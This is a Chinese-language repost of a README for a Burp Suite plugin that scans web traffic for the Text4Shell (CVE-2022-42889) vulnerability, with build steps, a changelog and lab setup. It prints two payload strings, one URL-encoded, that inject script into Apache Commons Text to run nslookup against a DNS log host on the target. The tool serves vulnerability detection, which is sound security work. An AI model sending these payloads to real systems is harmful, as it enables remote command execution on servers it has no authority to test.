项目地址：https://github.com/A0WaQ4/BurpText4ShellScan

使用java编写的Text4shell burp被动扫描插件

java maven项目，可以使用mvn package进行编译

更新

1.0 - 首次上传，对所有经过burp的包进行被动扫描，扫描对象包括了json、xml、fileupload1.1 - 修复了body为空时导致的检测错误，修复了对URL参数不检测的错误1.2 - 修复了body仅有json与xml时出现的参数构造错误，修复了dns二次检测时未获取key导致的错误1.3 - 添加了主动扫描功能1.4 - 添加了header黑名单功能，可以在resources/config.yml中修改

payload

- "%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup+dns-url%27%29%7D"- "${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup dns-url')}"

可以在resources/config.yml修改

使用

1. 搭建环境

使用github中的https://github.com/karthikuj/cve-2022-42889-text4shell-docker搭建环境

2. 插件

代理访问http://yourip:80/text4shell/attack?search=aaa，开始扫描

在logger中可看见插件发送的包

仅对是否可以dnslog进行扫描，若dnslog接受到请求，则爆出漏洞

3. 配置

在resources/config.yml中的dnsLogModule修改dnslog配置，使用时可以修改为自搭建的DnsLog服务器

免责声明

该工具仅用于安全自查检测，由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。

https://pan.quark.cn/s/a832d2a6aa8a

原文始发于微信公众号（菜鸟学信安）：Text4Shell的burp被动扫描插件